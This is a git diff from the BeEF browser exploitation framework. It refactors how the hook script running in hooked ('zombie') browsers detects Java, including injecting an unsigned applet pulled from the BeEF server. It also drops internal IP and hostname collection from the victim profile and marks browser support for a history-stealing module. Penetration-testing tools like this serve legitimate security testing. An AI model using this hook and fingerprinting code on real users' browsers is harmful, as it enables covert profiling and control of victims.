diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 820cbbad0..547ee4a55 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -492,38 +492,55 @@ beef.browser = { return flash_installed; } }, + + /** + * Checks if the zombie has Java enabled. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.javaEnabled()) { ... } + */ + javaEnabled: function() { + + return (!!window.navigator.javaEnabled && !!window.navigator.javaEnabled()); + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. * * @example: if(beef.browser.hasJava()) { ... } */ - hasJava: function() { - if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) { - // if Chrome is detected, return true without injecting the unsigned applet. - // latest versions of Chrome requires manual user intervention even with unsigned applets, - // so basically we don't want to alert the user after the initial hook. - //todo antisnatchor: this is a temporal fix, otherwise Safari is not-hooked. - //todo the applet in safari takes a few seconds to load. - if(beef.browser.isC() && beef.browser.isS()){ - return true; + // Check if Java is enabled + if (!beef.browser.javaEnabled()) { + return false; + } - }else{ - //inject an unsigned java applet to double check if the Java plugin is working fine. - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; - var applet_id = 'checkJava'; - var applet_name = 'checkJava'; - var output; - beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , - null, applet_archive, null); - output = document.Microsoft_Corporation.getInfo(); - beef.dom.detachApplet('checkJava'); - return output = 1; - } - }return false; + // This is a temporary fix as this does not work on Safari and Chrome + // Chrome requires manual user intervention even with unsigned applets. + // Safari requires a few seconds to load the applet. + if (beef.browser.isC() || beef.browser.isS()) { + return true; + } + + // Inject an unsigned java applet to double check if the Java + // plugin is working fine. + try { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; + var applet_id = 'checkJava'; + var applet_name = 'checkJava'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + beef.dom.detachApplet('checkJava'); + return output = 1; + } catch(e) { + return false; + } + return false; }, /** @@ -694,12 +711,10 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var os_name = beef.os.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; - var internal_ip = beef.net.local.getLocalAddress(); - var internal_hostname = beef.net.local.getLocalHostname(); var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_params = beef.browser.getScreenParams(); var window_size = beef.browser.getWindowSize(); - var java_enabled = (beef.browser.hasJava())? "Yes" : "No"; + var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; @@ -720,12 +735,10 @@ beef.browser = { if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; if(system_platform) details['SystemPlatform'] = system_platform; - if(internal_ip) details['InternalIP'] = internal_ip; - if(internal_hostname) details['InternalHostname'] = internal_hostname; if(browser_type) details['BrowserType'] = browser_type; if(screen_params) details['ScreenParams'] = screen_params; if(window_size) details['WindowSize'] = window_size; - if(java_enabled) details['JavaEnabled'] = java_enabled + if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash if(has_web_socket) details['HasWebSocket'] = has_web_socket diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 86300c74a..814fb0ecc 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal ip address - internal_ip = BD.get(zombie_session, 'InternalIP') - if not internal_ip.nil? - encoded_internal_ip = CGI.escapeHTML(internal_ip) - encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_ip_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - - # set and add the internal hostname - internal_hostname = BD.get(zombie_session, 'InternalHostname') - if not internal_hostname.nil? - encoded_internal_hostname = CGI.escapeHTML(internal_hostname) - encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_hostname_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the System Platform system_platform = BD.get(zombie_session, 'SystemPlatform') if not system_platform.nil? diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index 1f65112cb..e32dc6eb2 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -417,21 +417,6 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal ip address - internal_ip = BD.get(self.targetsession, 'InternalIP') - if not internal_ip.nil? - encoded_internal_ip = CGI.escapeHTML(internal_ip) - encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_ip_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the System Platform system_platform = BD.get(self.targetsession, 'SystemPlatform') if not system_platform.nil? @@ -447,21 +432,6 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal hostname - internal_hostname = BD.get(self.targetsession, 'InternalHostname') - if not internal_hostname.nil? - encoded_internal_hostname = CGI.escapeHTML(internal_hostname) - encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_hostname_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the zombie screen size and color depth screen_params = BD.get(self.targetsession, 'ScreenParams') if not screen_params.nil? diff --git a/extensions/initialization/handler.rb b/extensions/initialization/handler.rb index c6dd1d66b..dbb8560a2 100644 --- a/extensions/initialization/handler.rb +++ b/extensions/initialization/handler.rb @@ -169,22 +169,6 @@ module BeEF self.err_msg "Invalid system platform returned from the hook browser's initial connection." end - # get and store the internal ip address - internal_ip = get_param(@data['results'], 'InternalIP') - if BeEF::Filters.is_valid_ip?(internal_ip) - BD.set(session_id, 'InternalIP', internal_ip) - else - self.err_msg "Invalid internal IP address returned from the hook browser's initial connection." - end - - # get and store the internal hostname - internal_hostname = get_param(@data['results'], 'InternalHostname') - if BeEF::Filters.is_valid_hostname?(host_name) - BD.set(session_id, 'InternalHostname', internal_hostname) - else - self.err_msg "Invalid internal hostname returned from the hook browser's initial connection." - end - # get and store the hooked browser type browser_type = get_param(@data['results'], 'BrowserType') if BeEF::Filters.is_valid_browsertype?(browser_type) @@ -209,6 +193,14 @@ module BeEF self.err_msg "Invalid window size returned from the hook browser's initial connection." end + # get and store the yes|no value for HasJava + has_java = get_param(@data['results'], 'HasJava') + if BeEF::Filters.is_valid_yes_no?(has_java) + BD.set(session_id, 'HasJava', has_java) + else + #self.err_msg "Invalid value for HasJava returned from the hook browser's initial connection." + end + # get and store the yes|no value for JavaEnabled java_enabled = get_param(@data['results'], 'JavaEnabled') if BeEF::Filters.is_valid_yes_no?(java_enabled) diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml index 73f5b5d29..167088243 100644 --- a/modules/browser/get_history/config.yaml +++ b/modules/browser/get_history/config.yaml @@ -23,3 +23,4 @@ beef: authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: working: ["FF","IE"] + not_working: ["O","C","S"]